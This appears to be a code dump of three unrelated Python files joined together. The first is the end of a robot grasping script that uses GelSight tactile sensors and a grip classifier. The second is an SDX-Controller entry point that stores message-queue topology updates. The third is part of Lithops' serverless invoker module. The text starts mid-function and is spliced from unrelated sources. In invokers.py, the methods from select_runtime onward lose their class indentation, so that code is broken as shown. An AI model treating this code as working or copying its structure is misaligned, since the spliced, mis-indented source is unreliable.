            des_EE_xyz_above = des_EE_xyz + np.array([0, 0, 0.18])
        # Move above the object
        goto_EE_xyz(goal_xyz=des_EE_xyz_above, goal_orientation=Orientations.DOWNWARD_ROTATED, limb=limb,
                    joint_pos_publisher=desired_joint_pos_publisher, speed=0.2)
        # Rotate the gripper
        goto_EE_xyz(goal_xyz=des_EE_xyz_above, goal_orientation=des_orientation_EE, limb=limb,
                    joint_pos_publisher=desired_joint_pos_publisher, speed=0.2)
        # Record the time pre grasping
        time_pre_grasping = rospy.get_time()
        dr_tc.set_time_pre_grasping(time_pre_grasping)
        # Move down to the object and record the location of the EE
        goto_EE_xyz(goal_xyz=des_EE_xyz, goal_orientation=des_orientation_EE, limb=limb,
                    joint_pos_publisher=desired_joint_pos_publisher, speed=0.1)
        dr_tc.set_location_of_EE_at_grasping(des_EE_xyz)
        dr_tc.set_angle_of_EE_at_grasping(des_orientation_EE.y)
        # Grasp the object and record the time
        grasp_object(gripper, dr_tc)
        time.sleep(0.5)  # This is crucial!!!! keep it!
        time_at_grasping = rospy.get_time()
        dr_tc.set_time_at_grasping(time_at_grasping)
        # Get image from GelSights and update plot
        gelA_img_r = gelSightA.get_image()
        gelA_img_r = cv2.cvtColor(gelA_img_r, cv2.COLOR_BGR2RGB)
        gelB_img_r = gelSightB.get_image()
        gelB_img_r = cv2.cvtColor(gelB_img_r, cv2.COLOR_BGR2RGB)
        gelA_img.set_data(gelA_img_r)
        gelB_img.set_data(gelB_img_r)
        plt.draw()
        plt.ion()
        plt.show()
        # Raise the object slightly above current position
        goto_EE_xyz(goal_xyz=des_EE_xyz_above, goal_orientation=des_orientation_EE, limb=limb,
                    joint_pos_publisher=desired_joint_pos_publisher, speed=0.1)
        time.sleep(0.5)
        # Get image from GelSights and update plot
        gelA_img_r = gelSightA.get_image()
        gelA_img_r = cv2.cvtColor(gelA_img_r, cv2.COLOR_BGR2RGB)
        gelB_img_r = gelSightB.get_image()
        gelB_img_r = cv2.cvtColor(gelB_img_r, cv2.COLOR_BGR2RGB)
        gelA_img.set_data(gelA_img_r)
        gelB_img.set_data(gelB_img_r)
        plt.draw()
        plt.ion()
        plt.show()
        # Record the time
        time_post1_grasping = rospy.get_time()
        dr_tc.set_time_post1_grasping(time_post1_grasping)
        # Wait a little
        time.sleep(time_waiting_in_air)
        # Check whether the object still is in the gripper:
        # compare current GelSight frames against the pre-grasp frames.
        gelA_img_r = gelSightA.get_image()
        gelB_img_r = gelSightB.get_image()
        pred_A = net.predict(gelA_img_r, gelA_img_r_ini)
        pred_B = net.predict(gelB_img_r, gelB_img_r_ini)
        dr_tc.set_probability_A(pred_A)
        dr_tc.set_probability_B(pred_B)
        print("Pred A:", pred_A)
        print("Pred B:", pred_B)
        gelA_img_r = cv2.cvtColor(gelA_img_r, cv2.COLOR_BGR2RGB)
        gelB_img_r = cv2.cvtColor(gelB_img_r, cv2.COLOR_BGR2RGB)
        gelA_img.set_data(gelA_img_r)
        gelB_img.set_data(gelB_img_r)
        plt.draw()
        plt.ion()
        plt.show()
        # Success if either classifier is confident (>= 0.8) ...
        is_gripping_A = False
        if pred_A >= 0.8:
            is_gripping_A = True
        is_gripping_B = False
        if pred_B >= 0.8:
            is_gripping_B = True
        # ... or the gripper still reports a holding force (>= 2).
        is_gripping_gripper = False
        gripper_force = gripper.get_force()
        if gripper_force >= 2:
            is_gripping_gripper = True
        print("Getting gripping force:", gripper_force)
        is_gripping = is_gripping_A or is_gripping_B or is_gripping_gripper
        # is_gripping = is_gripping_A or is_gripping_gripper
        rp.log_message('Am I gripping? %s' % is_gripping)
        # Record the result
        dr_tc.set_is_gripping(is_gripping)
        # Record the time
        time_post2_grasping = rospy.get_time()
        dr_tc.set_time_post2_grasping(time_post2_grasping)
        if is_gripping:
            # If we are still gripping the object we return object to the ground at a random location
            # Compute random x and y coordinates
            r_x = np.random.uniform(0.15, 0.85, 1)
            r_y = np.random.uniform(0.15, 0.85, 1)
            x_min = bounds_table[0, 0]
            x_max = bounds_table[0, 1]
            y_min = bounds_table[1, 0]
            y_max = bounds_table[1, 1]
            x_r = r_x * x_min + (1 - r_x) * x_max
            y_r = r_y * y_min + (1 - r_y) * y_max
            # (comment below to go back to the original position)
            des_EE_xyz = np.array((x_r, y_r, des_EE_xyz[2]))
            # Move above the new random position
            des_EE_xyz_above = des_EE_xyz.copy()
            des_EE_xyz_above[2] = des_EE_xyz[2] + 0.2
            goto_EE_xyz(goal_xyz=des_EE_xyz_above, goal_orientation=des_orientation_EE, limb=limb,
                        joint_pos_publisher=desired_joint_pos_publisher, speed=0.1)
            # Randomize the rotation too
            random_orientation = orientation_downward(np.random.uniform(0, np.pi))
            goto_EE_xyz(goal_xyz=des_EE_xyz_above, goal_orientation=random_orientation, limb=limb,
                        joint_pos_publisher=desired_joint_pos_publisher, speed=0.1)
            # Go down to the random position and let go of the object
            goto_EE_xyz(goal_xyz=des_EE_xyz + np.array([0, 0, 0.02]), goal_orientation=random_orientation, limb=limb,
                        joint_pos_publisher=desired_joint_pos_publisher, speed=0.1)
            gripper.open(speed=100)  # Open gripper
            time.sleep(0.5)
            # Go up, but a little higher than before
            des_EE_xyz_above[2] = 0.60
            goto_EE_xyz(goal_xyz=des_EE_xyz_above, goal_orientation=random_orientation, limb=limb,
                        joint_pos_publisher=desired_joint_pos_publisher, speed=0.2)
            # Get image from GelSights and update plot
            gelA_img_r = gelSightA.get_image()
            gelA_img_r = cv2.cvtColor(gelA_img_r, cv2.COLOR_BGR2RGB)
            gelB_img_r = gelSightB.get_image()
            gelB_img_r = cv2.cvtColor(gelB_img_r, cv2.COLOR_BGR2RGB)
            gelA_img.set_data(gelA_img_r)
            gelB_img.set_data(gelB_img_r)
            plt.draw()
            plt.ion()
            plt.show()
            # Go back to rest position
            goto_rest_pos(limb=limb, joint_pos_publisher=desired_joint_pos_publisher, torque=True, speed=0.2)
        else:
            # If we are not gripping the object, i.e. the grasp failed, we move to the resting position immediately.
            gripper.open(speed=200)
            goto_rest_pos(limb=limb, joint_pos_publisher=desired_joint_pos_publisher, torque=True, speed=0.2)
        # Reset the gripper
        gripper.homing()
        # Stop recording data for this iteration
        dr_tc.stop_record()
        if save_parallel:
            # Wait for the previous iteration's compression before starting a new one.
            if comp_task is not None:
                ut.tic('Waiting for comp_task')
                if not comp_task.wait():
                    raise RuntimeError('Compression task failed!')
                ut.toc()
            comp_task = dr.CompressionTask(dr_tc, pool)
            comp_task.run_async()
        else:
            comp_task = dr.CompressionTask(dr_tc, pool)
            comp_task.run_sync()
        import gc;
        gc.collect()
        end_time = rospy.get_time()
        print("Time of grasp:", end_time - start_time)
    # Stop recorder (only reached if the loop ever exits)
    # TODO: move end_processes outside of data_recorder
    dr_tc.end_processes()
    # kinectA.end_process()
    # kinectB.end_process()
    # gelSightB.end_process()
    # gelSightA.end_process()
    rospy.signal_shutdown("Example finished.")
def testGelSights():
    """Manual sanity check of the GelSight sensors and the grip classifier.

    Streams both GelSight cameras, runs the is-gripping classifier against
    the initial frames, and overlays the probabilities on a live OpenCV view.
    Press 'q' in an OpenCV window to exit.
    """
    # rospy.init_node('Testing')
    init_robot('right')
    # Start Topic for the Gelsight
    # os.system("for pid in $(ps -ef | grep 'gelsight' | awk '{print $2}'); do kill -9 $pid; done")
    # os.system(
    #     'roslaunch manu_sawyer gelsightA_driver.launch > /home/guser/catkin_ws/src/manu_research/temp/gelsightA_driver.txt 2>&1 &')
    # os.system(
    #     'roslaunch manu_sawyer gelsightB_driver.launch > /home/guser/catkin_ws/src/manu_research/temp/gelsightB_driver.txt 2>&1 &')
    # time.sleep(10)
    gelSightA = GelSightA()
    # time.sleep(10)
    gelSightB = GelSightB()
    time.sleep(10)
    # Reference (no-contact) frames used as the classifier baseline.
    gelA_ini = gelSightA.get_image()
    gelB_ini = gelSightB.get_image()
    # Fixed: removed the dead first assignment (net.tf-3000) that was
    # immediately overwritten, and the unused loop counter `i`.
    model_path = "/home/manu/ros_ws/src/manu_research/manu_sawyer/src/tensorflow_model_is_gripping/training/net.tf-4600"
    net = press.NetClf(model_path, "/gpu:0")
    # Green-to-red colormap: green = high probability of gripping.
    cmap = pylab.cm.RdYlGn
    while True:
        frameA = gelSightA.get_image()
        frameB = gelSightB.get_image()
        if cv2.waitKey(1) & 0xFF == ord('q'):
            break
        probA = net.predict(frameA, gelA_ini)
        probB = net.predict(frameB, gelB_ini)
        # Fixed: materialize the colors as lists — under Python 3, passing a
        # lazy map object as the cv2.putText color argument fails.
        colorA = [int(c) for c in 255 * np.array(cmap(probA))[:3]]
        colorB = [int(c) for c in 255 * np.array(cmap(probB))[:3]]
        cv2.putText(frameA, '%.2f' % probA, (0, 50),
                    cv2.FONT_HERSHEY_SIMPLEX, 1, colorA)
        cv2.putText(frameB, '%.2f' % probB, (0, 50),
                    cv2.FONT_HERSHEY_SIMPLEX, 1, colorB)
        cv2.imshow('frameA', frameA)
        cv2.imshow('frameB', frameB)
if __name__ == '__main__':
    # Entry point: run the grasping data-collection loop.
    # testGelSights()
    main()
|
__main__.py | #!/usr/bin/env python3
import connexion
from swagger_server import encoder
from swagger_server.messaging.rpc_queue_consumer import *
from swagger_server.utils.db_utils import *
from optparse import OptionParser
import argparse
import time
import threading
import logging
import json
# make sure to install datamodel:
# https://github.com/atlanticwave-sdx/datamodel
from datamodel.sdxdatamodel import parsing
from datamodel.sdxdatamodel import topologymanager
from datamodel.sdxdatamodel import validation
from datamodel.sdxdatamodel.validation.topologyvalidator import TopologyValidator
from datamodel.sdxdatamodel.parsing.topologyhandler import TopologyHandler
from datamodel.sdxdatamodel.topologymanager.manager import TopologyManager
from datamodel.sdxdatamodel.topologymanager.grenmlconverter import GrenmlConverter
from datamodel.sdxdatamodel.parsing.exceptions import DataModelException
def is_json(myjson):
    """Return True if *myjson* parses as JSON, False otherwise.

    :param myjson: candidate JSON document (str/bytes).
    :return: bool

    Also returns False (instead of raising TypeError) for non-string inputs
    such as None, which json.loads would otherwise reject with an uncaught
    exception.
    """
    try:
        json.loads(myjson)
    except (ValueError, TypeError):
        return False
    return True
def find_between(s, first, last):
    """Return the substring of *s* strictly between the first occurrence of
    *first* and the next occurrence of *last*; '' if either is absent."""
    try:
        begin = s.index(first) + len(first)
        end = s.index(last, begin)
    except ValueError:
        # One of the delimiters was not found.
        return ""
    return s[begin:end]
def start_consumer(thread_queue, db_instance):
    """Consume MQ messages forever: persist them to the DB and keep the
    merged domain topology up to date.

    :param thread_queue: queue filled by the RpcConsumer thread with raw
        MQ messages (topology updates, heart beats, or arbitrary payloads).
    :param db_instance: key/value DB wrapper (add_key_value_pair_to_db /
        read_from_db).
    """
    logger = logging.getLogger(__name__)
    logging.getLogger("pika").setLevel(logging.WARNING)
    # Counter for non-JSON messages (used as their DB key).
    MESSAGE_ID = 0
    HEARTBEAT_ID = 0
    # Background thread that feeds thread_queue from the message queue.
    rpc = RpcConsumer(thread_queue, '')
    t1 = threading.Thread(target=rpc.start_consumer, args=())
    t1.start()
    manager = TopologyManager()
    num_domain_topos = 0
    # NOTE(review): this condition looks inverted — it resets an EXISTING
    # 'num_domain_topos' entry to 0 and never initializes a missing one;
    # confirm whether `is None` was intended.
    if db_instance.read_from_db('num_domain_topos') is not None:
        db_instance.add_key_value_pair_to_db('num_domain_topos', num_domain_topos)
    latest_topo = {}
    # Domains whose topology has already been added to the manager.
    domain_list = set()
    while True:
        # Busy-poll the queue; blocks CPU-light only because messages are rare.
        if not thread_queue.empty():
            msg = thread_queue.get()
            logger.debug("MQ received message:" + str(msg))
            if 'Heart Beat' in str(msg):
                HEARTBEAT_ID += 1
                logger.debug('Heart beat received. ID: ' + str(HEARTBEAT_ID))
            else:
                logger.info('Saving to database.')
                if is_json(msg):
                    # Topology messages are distinguished by a 'version' field.
                    if 'version' in str(msg):
                        logger.info("MQ received message:" + str(msg))
                        msg_json = json.loads(msg)
                        msg_id = msg_json["id"]
                        msg_version = msg_json["version"]
                        lc_queue_name = msg_json["lc_queue_name"]
                        logger.debug("---lc_queue_name:---")
                        logger.debug(lc_queue_name)
                        # Domain name is embedded in the topology id, e.g.
                        # "...topology:<domain>.net".
                        domain_name = find_between(msg_id, "topology:", ".net")
                        msg_json["domain_name"] = domain_name
                        db_msg_id = str(msg_id) + "-" + str(msg_version)
                        # add message to db
                        db_instance.add_key_value_pair_to_db(db_msg_id, msg)
                        logger.info('Save to database complete.')
                        logger.info('message ID:' + str(db_msg_id))
                        # Update existing topology
                        if domain_name in domain_list:
                            logger.info("updating topo")
                            manager.update_topology(msg_json)
                        # Add new topology
                        else:
                            domain_list.add(domain_name)
                            logger.info("adding topo")
                            manager.add_topology(msg_json)
                            # Maintain a persistent count of known domain topologies.
                            if db_instance.read_from_db('num_domain_topos') is None:
                                num_domain_topos = 1
                                db_instance.add_key_value_pair_to_db('num_domain_topos', num_domain_topos)
                            else:
                                num_domain_topos = db_instance.read_from_db('num_domain_topos')
                                num_domain_topos = int(num_domain_topos) + 1
                                db_instance.add_key_value_pair_to_db('num_domain_topos', num_domain_topos)
                            logger.info("adding topo to db:")
                            db_key = 'LC-' + str(num_domain_topos)
                            db_instance.add_key_value_pair_to_db(db_key, json.dumps(msg_json))
                        latest_topo = json.dumps(manager.get_topology().to_dict())
                        # use 'latest_topo' as PK to save latest topo to db
                        db_instance.add_key_value_pair_to_db('latest_topo', latest_topo)
                        logger.info('Save to database complete.')
                    else:
                        logger.info('got message from MQ: ' + str(msg))
                else:
                    # Non-JSON payloads are stored under an incrementing integer key.
                    db_instance.add_key_value_pair_to_db(MESSAGE_ID, msg)
                    logger.debug('Save to database complete.')
                    logger.debug('message ID:' + str(MESSAGE_ID))
                    value = db_instance.read_from_db(MESSAGE_ID)
                    logger.debug('got value from DB:')
                    logger.debug(value)
                    MESSAGE_ID += 1
def main():
    """Start the SDX-Controller: swagger API in a thread, DB setup, and the
    blocking MQ consumer loop."""
    # Sleep 7 seconds waiting for RabbitMQ to be ready
    # time.sleep(7)
    logging.basicConfig(level=logging.INFO)
    # Run swagger service
    app = connexion.App(__name__, specification_dir='./swagger/')
    app.app.json_encoder = encoder.JSONEncoder
    app.add_api('swagger.yaml', arguments={'title': 'SDX-Controller'}, pythonic_params=True)
    # Run swagger in a thread
    threading.Thread(target=lambda: app.run(port=8080)).start()
    # app.run(port=8080)
    # NOTE(review): `os` and `Queue` come from the wildcard imports above;
    # this raises TypeError if the DB_NAME env variable is unset — confirm.
    DB_NAME = os.environ.get('DB_NAME') + '.sqlite3'
    MANIFEST = os.environ.get('MANIFEST')
    # Get DB connection and tables set up.
    db_tuples = [('config_table', "test-config")]
    db_instance = DbUtils()
    db_instance._initialize_db(DB_NAME, db_tuples)
    # amqp_url = 'amqp://guest:guest@aw-sdx-monitor.renci.org:5672/%2F'
    thread_queue = Queue()
    # Blocks forever consuming MQ messages.
    start_consumer(thread_queue, db_instance)
if __name__ == '__main__':
    # Script entry point.
    main()
|
invokers.py | #
# (C) Copyright IBM Corp. 2020
# (C) Copyright Cloudlab URV 2020
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import json
import pika
import time
import random
import queue
import logging
import multiprocessing as mp
from threading import Thread
from types import SimpleNamespace
from concurrent.futures import ThreadPoolExecutor
from lithops.version import __version__
from lithops.future import ResponseFuture
from lithops.config import extract_storage_config
from lithops.utils import version_str, is_lithops_worker, is_unix_system
from lithops.storage.utils import create_job_key
from lithops.constants import LOGGER_LEVEL, LITHOPS_TEMP_DIR
from lithops.util.metrics import PrometheusExporter
logger = logging.getLogger(__name__)
class Invoker:
    """
    Abstract invoker base class.

    Holds the configuration, storage handles and monitoring hooks shared by
    every concrete invoker implementation; subclasses supply the actual
    invocation strategy via select_runtime()/run().
    """

    def __init__(self, config, executor_id, internal_storage, compute_handler):
        effective_level = logger.getEffectiveLevel()
        self.log_active = effective_level != logging.WARNING
        self.log_level = effective_level if self.log_active else LOGGER_LEVEL

        self.config = config
        self.executor_id = executor_id
        self.storage_config = extract_storage_config(self.config)
        self.internal_storage = internal_storage
        self.compute_handler = compute_handler
        self.is_lithops_worker = is_lithops_worker()

        # Maximum number of concurrent workers allowed by the user config.
        self.workers = self.config['lithops'].get('workers')
        logger.debug('ExecutorID {} - Total available workers: {}'
                     .format(self.executor_id, self.workers))

        prom_enabled = self.config['lithops'].get('monitoring', False)
        prom_config = self.config.get('prometheus', {})
        self.prometheus = PrometheusExporter(prom_enabled, prom_config)

        # The runtime name lives under the section of the active mode.
        mode = self.config['lithops']['mode']
        self.runtime_name = self.config[mode]['runtime']

    def select_runtime(self, job_id, runtime_memory):
        """Create a runtime and return its metadata. Subclass responsibility."""
        raise NotImplementedError

    def run(self, job):
        """Run a job. Subclass responsibility."""
        raise NotImplementedError

    def stop(self):
        """Stop invoker-related processes. No-op by default."""
        pass
class StandaloneInvoker(Invoker):
    """
    Module responsible to perform the invocations against the Standalone backend
    """

    def __init__(self, config, executor_id, internal_storage, compute_handler):
        super().__init__(config, executor_id, internal_storage, compute_handler)

    def select_runtime(self, job_id, runtime_memory):
        """Return the runtime metadata, deploying the runtime first if it is
        not yet installed; raises if its Python version differs from ours."""
        logger.info('ExecutorID {} | JobID {} - Selected Runtime: {} '
                    .format(self.executor_id, job_id, self.runtime_name))

        runtime_key = self.compute_handler.get_runtime_key(self.runtime_name)
        runtime_meta = self.internal_storage.get_runtime_meta(runtime_key)
        if not runtime_meta:
            logger.info('Runtime {} is not yet installed'.format(self.runtime_name))
            runtime_meta = self.compute_handler.create_runtime(self.runtime_name)
            self.internal_storage.put_runtime_meta(runtime_key, runtime_meta)

        local_ver = version_str(sys.version_info)
        remote_ver = runtime_meta['python_ver']
        if local_ver != remote_ver:
            raise Exception(("The indicated runtime '{}' is running Python {} and it "
                             "is not compatible with the local Python version {}")
                            .format(self.runtime_name, remote_ver, local_ver))
        return runtime_meta

    def run(self, job):
        """Submit *job* to the standalone backend and return one (already
        'Invoked') ResponseFuture per call."""
        job.runtime_name = self.runtime_name

        self.prometheus.send_metric(name='job_total_calls',
                                    value=job.total_calls,
                                    labels=(
                                        ('job_id', job.job_id),
                                        ('function_name', job.function_name)
                                    ))

        payload = {'config': self.config,
                   'log_level': self.log_level,
                   'executor_id': job.executor_id,
                   'job_id': job.job_id,
                   'job_description': job.__dict__,
                   'lithops_version': __version__}
        self.compute_handler.run_job(payload)
        logger.info('ExecutorID {} | JobID {} - {}() Invocation done - Total: {} activations'
                    .format(job.executor_id, job.job_id, job.function_name, job.total_calls))

        futures = []
        for call_index in range(job.total_calls):
            future = ResponseFuture("{:05d}".format(call_index), job,
                                    job.metadata.copy(), self.storage_config)
            future._set_state(ResponseFuture.State.Invoked)
            futures.append(future)
        return futures
class ServerlessInvoker(Invoker):
    """
    Module responsible to perform the invocations against the serverless backend
    """
    # Memory (MB) assigned to the function that performs remote invocations.
    REMOTE_INVOKER_MEMORY = 2048
    # Number of local invoker threads/processes spawned per executor.
    INVOKER_PROCESSES = 2

    def __init__(self, config, executor_id, internal_storage, compute_handler):
        super().__init__(config, executor_id, internal_storage, compute_handler)
        self.remote_invoker = self.config['serverless'].get('remote_invoker', False)
        # Threads are used inside a worker, on non-unix systems, or when
        # multiprocessing cannot fork; otherwise real processes are used.
        self.use_threads = (self.is_lithops_worker
                            or not is_unix_system()
                            or mp.get_start_method() != 'fork')
        self.invokers = []
        self.ongoing_activations = 0
        if self.use_threads:
            self.token_bucket_q = queue.Queue()
            self.pending_calls_q = queue.Queue()
            self.running_flag = SimpleNamespace(value=0)
            self.INVOKER = Thread
        else:
            self.token_bucket_q = mp.Queue()
            self.pending_calls_q = mp.Queue()
            self.running_flag = mp.Value('i', 0)
            self.INVOKER = mp.Process
        # NOTE(review): JobMonitor is not among the imports visible in this
        # chunk — presumably imported/defined elsewhere in the module; verify.
        self.job_monitor = JobMonitor(self.config, self.internal_storage, self.token_bucket_q)
        logger.debug('ExecutorID {} - Serverless invoker created'.format(self.executor_id))
def select_runtime(self, job_id, runtime_memory):
"""
Return the runtime metadata
"""
if not runtime_memory:
runtime_memory = self.config['serverless']['runtime_memory']
timeout = self.config['serverless']['runtime_timeout']
log_msg = ('ExecutorID {} | JobID {} - Selected Runtime: {} - {}MB '
.format(self.executor_id, job_id, self.runtime_name, runtime_memory))
logger.info(log_msg)
runtime_key = self.compute_handler.get_runtime_key(self.runtime_name, runtime_memory)
runtime_meta = self.internal_storage.get_runtime_meta(runtime_key)
if not runtime_meta:
logger.info('Runtime {} with {}MB is not yet installed'.format(self.runtime_name, runtime_memory))
runtime_meta = self.compute_handler.create_runtime(self.runtime_name, runtime_memory, timeout)
self.internal_storage.put_runtime_meta(runtime_key, runtime_meta)
py_local_version = version_str(sys.version_info)
py_remote_version = runtime_meta['python_ver']
if py_local_version != py_remote_version:
raise Exception(("The indicated runtime '{}' is running Python {} and it "
"is not compatible with the local Python version {}")
.format(self.runtime_name, py_remote_version, py_local_version))
return runtime_meta
def _start_invoker_process(self):
"""Starts the invoker process responsible to spawn pending calls
in background.
"""
for inv_id in range(self.INVOKER_PROCESSES):
p = self.INVOKER(target=self._run_invoker_process, args=(inv_id,))
self.invokers.append(p)
p.daemon = True
p.start()
    def _run_invoker_process(self, inv_id):
        """Run process that implements token bucket scheduling approach.

        Blocks until a token is available, then takes one pending call and
        submits it to a thread pool; exits on KeyboardInterrupt or when
        running_flag is cleared.
        """
        logger.debug('ExecutorID {} - Invoker process {} started'
                     .format(self.executor_id, inv_id))

        with ThreadPoolExecutor(max_workers=250) as executor:
            while True:
                try:
                    # Both get() calls block: one token consumed per call.
                    self.token_bucket_q.get()
                    job, call_id = self.pending_calls_q.get()
                except KeyboardInterrupt:
                    break
                if self.running_flag.value:
                    executor.submit(self._invoke, job, call_id)
                else:
                    break

        logger.debug('ExecutorID {} - Invoker process {} finished'
                     .format(self.executor_id, inv_id))
    def _invoke(self, job, call_id):
        """Method used to perform the actual invocation against the
        compute backend.

        On a failed invocation (no activation id, e.g. quota reached) the
        call is re-queued together with a fresh token after a random
        back-off, so another invoker retries it.
        """
        payload = {'config': self.config,
                   'log_level': self.log_level,
                   'func_key': job.func_key,
                   'data_key': job.data_key,
                   'extra_env': job.extra_env,
                   'execution_timeout': job.execution_timeout,
                   'data_byte_range': job.data_ranges[int(call_id)],
                   'executor_id': job.executor_id,
                   'job_id': job.job_id,
                   'call_id': call_id,
                   'host_submit_tstamp': time.time(),
                   'lithops_version': __version__,
                   'runtime_name': job.runtime_name,
                   'runtime_memory': job.runtime_memory}

        # do the invocation
        start = time.time()
        activation_id = self.compute_handler.invoke(job.runtime_name, job.runtime_memory, payload)
        roundtrip = time.time() - start
        resp_time = format(round(roundtrip, 3), '.3f')

        if not activation_id:
            # reached quota limit: random back-off, then retry via the queues
            time.sleep(random.randint(0, 5))
            self.pending_calls_q.put((job, call_id))
            self.token_bucket_q.put('#')
            return

        logger.debug('ExecutorID {} | JobID {} - Function call {} done! ({}s) - Activation'
                     ' ID: {}'.format(job.executor_id, job.job_id, call_id, resp_time, activation_id))
def _invoke_remote(self, job):
    """Method used to send a job_description to the remote invoker.

    Spawns a single activation carrying the whole job description; the
    remote side performs the per-call fan-out itself.

    :param job: job description object
    :raises Exception: if the backend could not spawn the remote invoker
    """
    start = time.time()

    payload = {'config': self.config,
               'log_level': self.log_level,
               'executor_id': job.executor_id,
               'job_id': job.job_id,
               'job_description': job.__dict__,
               'remote_invoker': True,
               # number of invoker processes the remote side should run
               'invokers': 4,
               'lithops_version': __version__}

    activation_id = self.compute_handler.invoke(job.runtime_name, self.REMOTE_INVOKER_MEMORY, payload)
    roundtrip = time.time() - start
    resp_time = format(round(roundtrip, 3), '.3f')

    if activation_id:
        logger.debug('ExecutorID {} | JobID {} - Remote invoker call done! ({}s) - Activation'
                     ' ID: {}'.format(job.executor_id, job.job_id, resp_time, activation_id))
    else:
        raise Exception('Unable to spawn remote invoker')
def run(self, job):
    """
    Run a job described in job_description.

    Either delegates the whole fan-out to a remote invoker function or
    performs the invocations locally (direct threads for the free worker
    slots, pending queue for the remainder), then builds and returns one
    ResponseFuture per function call.

    :param job: job description object (job.runtime_name is set here)
    :return: list of ResponseFuture in Invoked state, one per call
    """
    job.runtime_name = self.runtime_name

    # Drain stale tokens left over from a previous job so that
    # ongoing_activations only counts activations still in flight.
    try:
        while True:
            self.token_bucket_q.get_nowait()
            self.ongoing_activations -= 1
    except Exception:
        # queue.Empty terminates the drain loop
        pass

    self.prometheus.send_metric(name='job_total_calls',
                                value=job.total_calls,
                                labels=(
                                    ('job_id', job.job_id),
                                    ('function_name', job.function_name)
                                ))

    if self.remote_invoker:
        """
        Remote Invocation
        Use a single cloud function to perform all the function invocations
        """
        # Silence select_runtime()'s console output. Fix: restore stdout
        # (and close the devnull handle) even if select_runtime() raises;
        # the previous code leaked the file object and left sys.stdout
        # redirected on error.
        old_stdout = sys.stdout
        try:
            with open(os.devnull, 'w') as devnull:
                sys.stdout = devnull
                self.select_runtime(job.job_id, self.REMOTE_INVOKER_MEMORY)
        finally:
            sys.stdout = old_stdout
        log_msg = ('ExecutorID {} | JobID {} - Starting function '
                   'invocation: {}() - Total: {} activations'
                   .format(job.executor_id, job.job_id,
                           job.function_name, job.total_calls))
        logger.info(log_msg)
        th = Thread(target=self._invoke_remote, args=(job,), daemon=True)
        th.start()
        # give the invoker thread a head start before returning the futures
        time.sleep(0.1)
    else:
        """
        Normal Invocation
        Use local threads to perform all the function invocations
        """
        try:
            if self.running_flag.value == 0:
                self.ongoing_activations = 0
                self.running_flag.value = 1
                self._start_invoker_process()

            log_msg = ('ExecutorID {} | JobID {} - Starting function '
                       'invocation: {}() - Total: {} activations'
                       .format(job.executor_id, job.job_id,
                               job.function_name, job.total_calls))
            logger.info(log_msg)

            if self.ongoing_activations < self.workers:
                # Free worker slots available: invoke as many calls as fit
                # directly from this process; queue the rest.
                callids = range(job.total_calls)
                total_direct = self.workers - self.ongoing_activations
                callids_to_invoke_direct = callids[:total_direct]
                callids_to_invoke_nondirect = callids[total_direct:]

                self.ongoing_activations += len(callids_to_invoke_direct)

                logger.debug('ExecutorID {} | JobID {} - Free workers: '
                             '{} - Going to invoke {} function activations'
                             .format(job.executor_id, job.job_id, total_direct,
                                     len(callids_to_invoke_direct)))

                def _callback(future):
                    # surface any exception raised inside _invoke
                    future.result()

                executor = ThreadPoolExecutor(job.invoke_pool_threads)
                for i in callids_to_invoke_direct:
                    call_id = "{:05d}".format(i)
                    future = executor.submit(self._invoke, job, call_id)
                    future.add_done_callback(_callback)
                time.sleep(0.1)

                # Put into the queue the rest of the callids to invoke within the process
                if callids_to_invoke_nondirect:
                    logger.debug('ExecutorID {} | JobID {} - Putting remaining '
                                 '{} function invocations into pending queue'
                                 .format(job.executor_id, job.job_id,
                                         len(callids_to_invoke_nondirect)))
                    for i in callids_to_invoke_nondirect:
                        call_id = "{:05d}".format(i)
                        self.pending_calls_q.put((job, call_id))
            else:
                # All worker slots busy: every call goes through the queue.
                logger.debug('ExecutorID {} | JobID {} - Ongoing activations '
                             'reached {} workers, queuing {} function invocations'
                             .format(job.executor_id, job.job_id, self.workers,
                                     job.total_calls))
                for i in range(job.total_calls):
                    call_id = "{:05d}".format(i)
                    self.pending_calls_q.put((job, call_id))

            self.job_monitor.start_job_monitoring(job)

        except (KeyboardInterrupt, Exception):
            self.stop()
            # bare raise preserves the original traceback
            raise

    # Create all futures
    futures = []
    for i in range(job.total_calls):
        call_id = "{:05d}".format(i)
        fut = ResponseFuture(call_id, job,
                             job.metadata.copy(),
                             self.storage_config)
        fut._set_state(ResponseFuture.State.Invoked)
        futures.append(fut)

    return futures
def stop(self):
    """
    Stop the JobMonitor and shut down all background invoker workers.
    """
    self.job_monitor.stop()

    if not self.invokers:
        return

    logger.debug('ExecutorID {} - Stopping invoker'
                 .format(self.executor_id))
    self.running_flag.value = 0

    # One slot token plus one (None, None) sentinel per worker unblocks
    # every invoker loop so it can observe the cleared flag and exit.
    for _ in self.invokers:
        self.token_bucket_q.put('#')
        self.pending_calls_q.put((None, None))

    # Drain whatever is left so no stale calls survive into the next job.
    while not self.pending_calls_q.empty():
        try:
            self.pending_calls_q.get(False)
        except Exception:
            pass

    self.invokers = []
class CustomizedRuntimeInvoker(ServerlessInvoker):
    """
    Module responsible to perform the invocations against the serverless backend in realtime environments

    currently differs from ServerlessInvoker only by having one method that provides extension of specified environment with
    map function and modules to optimize performance in real time use cases by avoiding repeated data transfers from storage to
    action containers on each execution
    """

    def run(self, job):
        """
        Extend runtime and run a job described in job_description.

        :param job: job description object
        :return: list of ResponseFuture (from ServerlessInvoker.run)
        """
        logger.warning("Warning, you are using customized runtime feature. "
                       "Please, notice that the map function code and dependencies "
                       "are stored and uploaded to docker registry. "
                       "To protect your privacy, use a private docker registry instead of public docker hub.")
        self._extend_runtime(job)
        return super().run(job)

    # If runtime not exists yet, build unique docker image and register runtime
    def _extend_runtime(self, job):
        """Build (if needed) and register a docker runtime extended with the
        job's function code and module dependencies.

        The image tag is derived from job.ext_runtime_uuid, so an identical
        function reuses the cached image and metadata on later runs.

        :param job: job description (provides func_key and ext_runtime_uuid)
        :return: runtime metadata dict
        :raises Exception: if the runtime's Python version differs from local
        """
        runtime_memory = self.config['serverless']['runtime_memory']

        base_docker_image = self.runtime_name
        uuid = job.ext_runtime_uuid
        ext_runtime_name = "{}:{}".format(base_docker_image.split(":")[0], uuid)

